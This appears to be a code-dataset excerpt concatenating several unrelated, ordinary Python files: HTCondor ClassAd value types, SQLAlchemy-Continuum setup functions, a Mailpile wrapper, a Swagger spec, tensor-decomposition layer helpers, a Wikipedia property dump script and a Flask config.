        # ERROR is absorbing: any ClassAd operation involving it yields ERROR.
        return Error()

    # All arithmetic, comparison and logical operators propagate ERROR
    # (aliased to __htc_eq__ above).
    __add__ = (
        __radd__
    ) = (
        __sub__
    ) = (
        __rsub__
    ) = (
        __mul__
    ) = (
        __rmul__
    ) = (
        __truediv__
    ) = (
        __rtruediv__
    ) = (
        __lt__
    ) = (
        __le__
    ) = (
        __ge__
    ) = __gt__ = __and__ = __rand__ = __or__ = __ror__ = __htc_ne__ = __htc_eq__

    def __eq__(self, other: PrimitiveExpression) -> "HTCBool":
        # Python-level equality (containers, tests): type identity only.
        if type(self) == type(other):
            return HTCBool(True)
        return HTCBool(False)

    def __ne__(self, other: PrimitiveExpression) -> "HTCBool":
        return HTCBool(not self.__eq__(other))

    def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
        # ClassAd NOT of ERROR is ERROR.
        return Error()

    def __repr__(self):
        return f"<{self.__class__.__name__}>"

    def __hash__(self):
        return hash("error")
class HTCInt(int, PrimitiveExpression):
    """ClassAd integer.

    Arithmetic with ints stays HTCInt; float/Undefined/Error operands are
    deferred to the other type (NotImplemented); anything else is ERROR.
    """

    __slots__ = ()

    def __add__(self, other):
        if isinstance(other, int):
            return HTCInt(super().__add__(other))
        elif isinstance(other, (float, Undefined, Error)):
            # Let the other operand's (reflected) implementation decide.
            return NotImplemented
        return Error()

    __radd__ = __add__

    def __sub__(self, other):
        if isinstance(other, int):
            return HTCInt(super().__sub__(other))
        elif isinstance(other, (float, Undefined, Error)):
            return NotImplemented
        return Error()

    def __mul__(self, other):
        if isinstance(other, int):
            return HTCInt(super().__mul__(other))
        elif isinstance(other, (float, Undefined, Error)):
            return NotImplemented
        return Error()

    def __truediv__(self, other):
        try:
            if isinstance(other, int):
                return HTCFloat(super().__truediv__(other))
            elif isinstance(other, (float, Undefined, Error)):
                return NotImplemented
            return Error()
        except ZeroDivisionError:
            # ClassAd semantics: division by zero is ERROR, not an exception.
            return Error()

    def __lt__(self, other):
        # Comparisons: incomparable operand types become ERROR instead of raising.
        try:
            result = super().__lt__(other)
        except TypeError:
            return Error()
        else:
            return result if result is NotImplemented else HTCBool(result)

    def __ge__(self, other):
        try:
            result = super().__ge__(other)
        except TypeError:
            return Error()
        else:
            return result if result is NotImplemented else HTCBool(result)

    def __gt__(self, other):
        try:
            result = super().__gt__(other)
        except TypeError:
            return Error()
        else:
            return result if result is NotImplemented else HTCBool(result)

    def __le__(self, other):
        try:
            result = super().__le__(other)
        except TypeError:
            return Error()
        else:
            return result if result is NotImplemented else HTCBool(result)

    def __htc_eq__(
        self, other: PrimitiveExpression
    ) -> Union[PrimitiveExpression, Undefined, Error]:
        # ClassAd == (distinct from Python ==): int vs int compares values.
        if isinstance(other, int):
            return HTCBool(super().__eq__(other))
        elif isinstance(other, (Undefined, Error, HTCFloat)):
            return NotImplemented
        elif isinstance(other, float):
            return HTCBool(self == other)
        return Error()

    def __htc_ne__(
        self, other: PrimitiveExpression
    ) -> Union[PrimitiveExpression, Undefined, Error]:
        # ClassAd !=: negate the ClassAd == result when it is a bool.
        result = self.__htc_eq__(other)
        if isinstance(result, HTCBool):
            return HTCBool(not result)
        return result

    def __eq__(self, other: PrimitiveExpression) -> "HTCBool":
        # Python-level equality (containers, tests).
        if isinstance(other, int):
            return HTCBool(super().__eq__(other))
        elif isinstance(other, float):
            return NotImplemented
        return HTCBool(False)

    def __ne__(self, other: PrimitiveExpression) -> "HTCBool":
        if isinstance(other, int):
            return HTCBool(super().__ne__(other))
        elif isinstance(other, float):
            return NotImplemented
        return HTCBool(True)

    def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
        # Logical NOT is not defined for integers in ClassAd.
        return Error()

    def __repr__(self):
        return f"<{self.__class__.__name__}>: {self}"

    def __hash__(self):
        return super().__hash__()
class HTCList(tuple, PrimitiveExpression):
    """Immutable list in the HTCondor ClassAd domain (backed by tuple)."""

    __slots__ = ()

    def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
        # Logical NOT of a list is not defined -> ERROR.
        return Error()

    def __repr__(self):
        return f"<{self.__class__.__name__}>: {[element for element in self]}"
class HTCStr(str, PrimitiveExpression):
    """String in the HTCondor ClassAd domain.

    ClassAd-level comparison (``__htc_eq__`` / ``__htc_ne__``) is
    case-insensitive, while Python-level ``__eq__`` / ``__ne__`` remain
    exact and type-strict.
    """

    __slots__ = ()

    def __htc_eq__(
        self, other: PrimitiveExpression
    ) -> Union[PrimitiveExpression, Undefined, Error]:
        # ClassAd strings compare case-insensitively.
        if isinstance(other, str):
            return HTCBool(self.lower() == other.lower())
        return NotImplemented

    def __htc_ne__(
        self, other: PrimitiveExpression
    ) -> Union[PrimitiveExpression, Undefined, Error]:
        # Negation of the case-insensitive equality; non-HTCBool results
        # (NotImplemented) are passed through unchanged.
        result = self.__htc_eq__(other)
        if isinstance(result, HTCBool):
            return HTCBool(not result)
        return result

    def __eq__(self, other: PrimitiveExpression) -> "HTCBool":
        # Exact, type-strict equality at the Python level.
        if type(self) == type(other) and super().__eq__(other):
            return HTCBool(True)
        return HTCBool(False)

    def __ne__(self, other: PrimitiveExpression) -> "HTCBool":
        if type(self) != type(other) or super().__ne__(other):
            return HTCBool(True)
        return HTCBool(False)

    def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
        # Logical NOT of a string is not defined -> ERROR.
        return Error()

    def __repr__(self):
        return f"<{self.__class__.__name__}>: {self}"

    def __hash__(self):
        return super().__hash__()
class HTCFloat(float, PrimitiveExpression):
    """Float in the HTCondor ClassAd domain.

    Multiplication with numbers stays HTCFloat; mixing with Undefined or
    Error defers via ``NotImplemented``; any other operand type evaluates
    to the ClassAd ERROR value.
    """

    __slots__ = ()

    def __mul__(self, other):
        if isinstance(other, (int, float)):
            return HTCFloat(super().__mul__(other))
        elif isinstance(other, (Undefined, Error)):
            # Let Undefined / Error absorb the operation.
            return NotImplemented
        return Error()

    __rmul__ = __mul__

    def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
        # Logical NOT of a float is not defined -> ERROR.
        return Error()

    def __htc_eq__(
        self, other: PrimitiveExpression
    ) -> Union[PrimitiveExpression, Undefined, Error]:
        # ClassAd-level equality: numbers compare directly; Undefined and
        # Error decide via their reflected methods.
        if isinstance(other, (int, float)):
            return HTCBool(super().__eq__(other))
        elif isinstance(other, (Undefined, Error)):
            return NotImplemented
        return Error()

    def __htc_ne__(
        self, other: PrimitiveExpression
    ) -> Union[PrimitiveExpression, Undefined, Error]:
        # Negate ClassAd equality when it produced a boolean; otherwise
        # propagate NotImplemented / Undefined / Error unchanged.
        result = self.__htc_eq__(other)
        if isinstance(result, HTCBool):
            return HTCBool(not result)
        return result

    def __eq__(self, other: PrimitiveExpression) -> "HTCBool":
        # Python-level equality: numeric compare, otherwise unequal.
        if isinstance(other, (int, float)):
            return HTCBool(super().__eq__(other))
        return HTCBool(False)

    def __ne__(self, other: PrimitiveExpression) -> "HTCBool":
        if isinstance(other, (int, float)):
            return HTCBool(super().__ne__(other))
        # BUG FIX: this fallback previously returned HTCBool(False), which
        # made a float simultaneously not-equal-False and not-unequal-False
        # against any non-numeric value. Mirror HTCInt.__ne__: values of
        # different, non-numeric types are unequal.
        return HTCBool(True)

    def __repr__(self):
        return f"<{self.__class__.__name__}>: {self}"

    def __hash__(self):
        return super().__hash__()
class HTCBool(PrimitiveExpression):
    """Boolean in the HTCondor ClassAd domain with three-valued logic.

    Wraps a plain Python bool in ``_value``. ``&`` / ``|`` implement the
    ClassAd short-circuit rules where Undefined can flow through and any
    other operand type yields ERROR.
    """

    __slots__ = ("_value",)

    def __init__(self, x):
        super().__init__()
        # Normalize any truthy/falsy input to a plain Python bool.
        self._value = True if x != 0 else False

    def __add__(self, other):
        # Arithmetic and ordering on booleans are not defined -> ERROR.
        return Error()

    __sub__ = __mul__ = __truediv__ = __gt__ = __ge__ = __le__ = __lt__ = __add__

    def __eq__(self, other):
        # Equal to another HTCBool wrapping the same value, or to the raw
        # Python bool it wraps (identity check against True/False).
        return (
            type(self) == type(other) and self._value == other._value
        ) or other is self._value

    def __ne__(self, other):
        # BUG FIX: the previous hand-rolled expression
        # `(type(self) == type(other) and self._value != other._value)
        #  or other is not self._value`
        # returned True for two HTCBools wrapping the same value, because
        # `other is not self._value` is True for any non-bool object.
        # Inequality is simply the negation of __eq__.
        return not self.__eq__(other)

    def __bool__(self):
        return self._value

    def __or__(self, other):
        # Three-valued OR: False || x -> x (for HTCBool/Undefined),
        # True || x -> True, anything else -> ERROR.
        if not self._value:
            if isinstance(other, (HTCBool, Undefined)):
                return other
        elif self._value:
            return HTCBool(True)
        return Error()

    def __and__(self, other):
        # Three-valued AND: False && x -> False,
        # True && x -> x (for HTCBool/Undefined), anything else -> ERROR.
        if not self._value:
            return HTCBool(False)
        elif self._value:
            if isinstance(other, (HTCBool, Undefined)):
                return other
        return Error()

    def __htc_eq__(
        self, other: PrimitiveExpression
    ) -> Union[PrimitiveExpression, Undefined, Error]:
        if isinstance(other, HTCBool):
            return HTCBool(self._value is other._value)
        elif isinstance(other, (Undefined, Error)):
            # Let Undefined / Error decide the result.
            return NotImplemented
        elif isinstance(other, bool):
            return HTCBool(self._value is other)
        return Error()

    def __htc_ne__(
        self, other: "PrimitiveExpression"
    ) -> "Union[HTCBool, Undefined, Error]":
        # a != b  <=>  (not a) == b  for booleans.
        return self.__htc_not__().__htc_eq__(other)

    def __htc_not__(self) -> "Union[HTCBool, Undefined, Error]":
        return HTCBool(not self._value)

    def __repr__(self):
        return f"<{self.__class__.__name__}>: {self._value}"

    def __hash__(self):
        return hash(self._value)
|
StarcoderdataPython
|
136383
|
import sqlalchemy as sa
from .exc import ClassNotVersioned, ImproperlyConfigured
from .manager import VersioningManager
from .operation import Operation
from .transaction import TransactionFactory
from .unit_of_work import UnitOfWork
from .utils import (
changeset,
count_versions,
get_versioning_manager,
is_modified,
is_session_modified,
parent_class,
transaction_class,
tx_column_name,
vacuum,
version_class,
)
__version__ = '1.3.9+geru.1'
versioning_manager = VersioningManager()
def make_versioned(
    mapper=sa.orm.mapper,
    session=sa.orm.session.Session,
    manager=versioning_manager,
    plugins=None,
    options=None,
    user_cls='User'
):
    """
    Public entry point of SQLAlchemy-Continuum: turn on versioning for the
    given mappers and sessions. With the defaults this covers all mappers
    and all Session subclasses.

    :param mapper:
        SQLAlchemy mapper to apply the versioning to.
    :param session:
        SQLAlchemy session to apply the versioning to. By default this is
        sa.orm.session.Session meaning it applies to all Session subclasses.
    :param manager:
        SQLAlchemy-Continuum versioning manager.
    :param plugins:
        Plugins to pass for versioning manager.
    :param options:
        A dictionary of VersioningManager options.
    :param user_cls:
        User class which the Transaction class should have relationship to.
        This can either be a class or string name of a class for lazy
        evaluation.
    """
    # Configure the manager before any listeners are attached.
    if plugins is not None:
        manager.plugins = plugins
    if options is not None:
        manager.options.update(options)
    manager.user_cls = user_cls

    manager.apply_class_configuration_listeners(mapper)
    manager.track_operations(mapper)
    manager.track_session(session)

    # Engine-level hooks: association-table writes, rollbacks and cloned
    # (execution-option) connections all need manager bookkeeping.
    engine_hooks = (
        ('before_cursor_execute', manager.track_association_operations),
        ('rollback', manager.clear_connection),
        ('set_connection_execution_options', manager.track_cloned_connections),
    )
    for event_name, handler in engine_hooks:
        sa.event.listen(sa.engine.Engine, event_name, handler)
def remove_versioning(
    mapper=sa.orm.mapper,
    session=sa.orm.session.Session,
    manager=versioning_manager
):
    """
    Detach SQLAlchemy-Continuum from the given mapper, session and manager,
    reversing everything :func:`make_versioned` set up.

    :param mapper:
        SQLAlchemy mapper to remove the versioning from.
    :param session:
        SQLAlchemy session to remove the versioning from. By default this is
        sa.orm.session.Session meaning it applies to all sessions.
    :param manager:
        SQLAlchemy-Continuum versioning manager.
    """
    manager.reset()
    manager.remove_class_configuration_listeners(mapper)
    manager.remove_operations_tracking(mapper)
    manager.remove_session_tracking(session)

    # Unhook the same engine-level events that make_versioned() attached.
    for event_name, handler in (
        ('before_cursor_execute', manager.track_association_operations),
        ('rollback', manager.clear_connection),
        ('set_connection_execution_options', manager.track_cloned_connections),
    ):
        sa.event.remove(sa.engine.Engine, event_name, handler)
|
StarcoderdataPython
|
1776294
|
import mailpile.app
import mailpile.commands
import mailpile.ui
# Load the standard plugins
from mailpile.plugins import *
__all__ = ['Mailpile',
"app", "commands", "plugins", "mailutils", "search", "ui", "util"]
class Mailpile(object):
    """Thin Python-level facade over Mailpile's command interface.

    On construction, every registered CLI command is exposed as a method on
    this object; calling the method runs the command against the session.
    """

    def __init__(self, ui=mailpile.ui.UserInteraction):
        self._config = mailpile.app.ConfigManager()
        self._session = mailpile.ui.Session(self._config)
        self._session.config.load(self._session)
        self._session.main = True
        self._ui = self._session.ui = ui()
        # Turn each registered command into a bound callable attribute.
        for (name, command_class) in mailpile.commands.COMMANDS.values():
            name, method = self._mk_action(name)
            doc = command_class.__doc__
            if command_class.SYNOPSIS:
                method.__doc__ = f'{name}({command_class.SYNOPSIS}) # {doc}'
            else:
                method.__doc__ = f'{name}() # {doc}'
            setattr(self, name, method)

    def _mk_action(self, name):
        # Commands whose name ends in '=' accept arguments; strip the
        # marker and build a closure of the matching arity.
        if not name.endswith('='):
            def action():
                return mailpile.commands.Action(self._session, name, '')
            return name, action
        name = name[:-1]

        def action(*args):
            return mailpile.commands.Action(self._session, name, args)
        return name, action
|
StarcoderdataPython
|
1791513
|
<filename>redap/specs/group/one.py
# -*- coding: utf-8 -*-
from . import get_group_spec, def_group, param_path
# Response definition for a successful single-group lookup: reuses the
# shared Group model definition and documents the 200 payload schema.
response_def = {
    'definition': def_group,
    'response': {
        "description": "Single group",
        "schema": {
            "$ref": "#/definitions/Group"
        }
    }
}

# Swagger/OpenAPI spec fragment for the "get one group" endpoint,
# parameterized by the path parameter and the 200 response above.
data = get_group_spec(
    summary='Get single group',
    params=[param_path],
    responses=[(200, response_def)]
)
|
StarcoderdataPython
|
1765961
|
# Copyright (c) 2015-2019 by the parties listed in the AUTHORS file.
# All rights reserved. Use of this source code is governed by
# a BSD-style license that can be found in the LICENSE file.
# import functions into our public API
from .tod import TOD, TODCache
from .interval import Interval, OpFlagGaps
from .tod_math import (
calibrate,
sim_noise_timestream,
OpCacheCopy,
OpCacheClear,
flagged_running_average,
OpCacheInit,
OpFlagsApply,
)
from .sim_noise import AnalyticNoise
from .sim_interval import regular_intervals
from .sim_det_noise import OpSimNoise
from .sim_focalplane import (
hex_layout,
rhombus_layout,
hex_pol_angles_qu,
hex_pol_angles_radial,
rhomb_pol_angles_qu,
plot_focalplane,
)
from .noise import Noise
from .polyfilter import OpPolyFilter
from .gainscrambler import OpGainScrambler
from .applygain import OpApplyGain, write_calibration_file
from .memorycounter import OpMemoryCounter
from .tidas import available as tidas_available
from .spt3g_utils import available as spt3g_available
|
StarcoderdataPython
|
3379047
|
<gh_stars>1-10
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
from torch.optim.lr_scheduler import StepLR
import torchvision
import torchvision.transforms as transforms
from torchvision import models
import tensorly as tl
import tensorly
from itertools import chain
from tensorly.decomposition import parafac, tucker, matrix_product_state
import os
import matplotlib.pyplot as plt
import numpy as np
import time
def decomposition_fc_layer(layer, rank):
    """Replace a fully connected layer by its rank-``rank`` MPS factorization.

    The weight matrix is decomposed with a matrix product state into two
    factors, which become two stacked ``Linear`` layers; the original bias
    is carried by the second (output-side) layer.
    """
    left, right = (factor.squeeze() for factor in
                   matrix_product_state(layer.weight.data, rank=rank))
    # First layer: input -> rank, weight is the right factor.
    first = torch.nn.Linear(right.shape[1], right.shape[0])
    first.weight.data = right
    # Second layer: rank -> output, carries the left factor and the bias.
    second = torch.nn.Linear(left.shape[1], left.shape[0])
    second.weight.data = left
    second.bias.data = layer.bias.data
    return nn.Sequential(first, second)
def tucker_decomposition_fc_layer(layer, rank):
    """Replace a fully connected layer by its rank-``rank`` Tucker factorization.

    The weight matrix is decomposed as ``l @ core @ r.T`` and mapped onto
    three stacked ``Linear`` layers; the original bias is carried by the
    last (output-side) layer.
    """
    core, [l, r] = tucker(layer.weight.data, rank=rank)
    # input -> rank_in projection; weight must be (rank_in, in_features), i.e. r.T
    right_layer = torch.nn.Linear(r.shape[0], r.shape[1])
    # rank_in -> rank_out map carrying the Tucker core tensor
    core_layer = torch.nn.Linear(core.shape[1], core.shape[0])
    # rank_out -> out_features projection; carries the original bias
    left_layer = torch.nn.Linear(l.shape[1], l.shape[0])
    left_layer.bias.data = layer.bias.data
    left_layer.weight.data = l
    # BUG FIX: the core factor was previously never copied into core_layer,
    # leaving that layer with its random initialization and silently
    # discarding the Tucker core.
    core_layer.weight.data = core
    right_layer.weight.data = r.T
    # Zero the inner biases (randomly initialized by nn.Linear) so the
    # stack computes l @ core @ r.T @ x + bias exactly.
    right_layer.bias.data.zero_()
    core_layer.bias.data.zero_()
    new_layers = [right_layer, core_layer, left_layer]
    return nn.Sequential(*new_layers)
|
StarcoderdataPython
|
4837407
|
import argparse
import requests
import json
import logging
queries = {}
def load_queries():
    """Populate the module-level ``queries`` mapping from queries.json."""
    global queries
    with open("queries.json", 'r') as f:
        queries = json.load(f)
def dump_all():
    """Dump the properties of every configured language."""
    # Iterating a dict yields its keys directly; no need for .keys().
    for lang in queries:
        dump(lang)
def dump(lang):
    """Fetch the Quarry property dump for ``lang`` and save it.

    Downloads the JSON output of the pre-configured Quarry run for the
    language, maps property id -> label, and writes the result to
    properties/<lang>.json via save_results().
    """
    logging.info("Saving properties for language '{}'".format(lang))
    dump_id = queries[lang]["json"]
    URL = "https://quarry.wmflabs.org/run/{}/output/0/json".format(dump_id)
    # Context manager guarantees the session is closed even if the request
    # raises (the original leaked the session on failure).
    with requests.Session() as S:
        R = S.get(url=URL)
        data = R.json()
    # Each row is (property_id, property_label, ...).
    results = {row[0]: row[1] for row in data["rows"]}
    save_results(results, lang)
def save_results(results, lang):
    """Write the property id -> label mapping to properties/<lang>.json."""
    with open("properties/{}.json".format(lang), 'w') as f:
        json.dump(results, f, indent=2)
if __name__ == "__main__":
    # Queries must be loaded first so the argparse help text can list the
    # languages that are actually configured.
    load_queries()
    parser = argparse.ArgumentParser(description='Dumps wikipedia properties')
    available_languages = ", ".join(["ALL"] + list(queries.keys()))
    parser.add_argument('LANG', metavar='LANG', type=str,
                        help='available languages: {}'.format(available_languages))
    args = parser.parse_args()
    lang = args.LANG
    # The sentinel value "ALL" dumps every configured language in turn.
    if lang == "ALL":
        dump_all()
    else:
        dump(lang)
|
StarcoderdataPython
|
3311504
|
# _*_ coding: utf-8 _*_
"""
Created by Alimazing on 2018/4/2.
"""
import os
__author__ = 'Alimazing'

# Dev mode ('development' vs 'product') is detected by the presence of a
# local dev config file.
is_dev_mode = os.path.exists('app/config/dev.py')

# Auth token lifetime in seconds (30 days).
TOKEN_EXPIRATION = 30 * 24 * 3600

EXTERNAL_URL = 'api.ivinetrue.com'  # external (remote) address
INTERNAL_URL = '0.0.0.0:8080'  # internal (local) address
# Serve locally in dev mode, publicly otherwise.
SERVER_URL = INTERNAL_URL if is_dev_mode else EXTERNAL_URL

IMG_PREFIX = SERVER_URL + '/static/images'
UPLOAD_FOLDER = 'app/static/uploads'

# Flasgger/Swagger UI configuration consumed by the API app.
SWAGGER = {
    "swagger_version": "2.0",
    "info": {
        "title": "微信小程序商城: API",
        "version": "0.3.0",
        "description": "简要描述一下这个api文档的功能",
        "contact": {
            "responsibleOrganization": "Shema(聆听)",
            "responsibleDeveloper": "Allen7D",
            "email": "<EMAIL>",
            "url": "http://ivinetrue.com"
        },
        "termsOfService": "http://ivinetrue.com"
    },
    "host": SERVER_URL, #"api.ivinetrue.com",
    "basePath": "/", # base bash for blueprint registration
    "tags": [],
    "schemes": [
        "http",
        "https"
    ],
    "operationId": "getmyData",
    "securityDefinitions": {
        'basicAuth': {
            'type': 'basic'
        }
    }
}
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.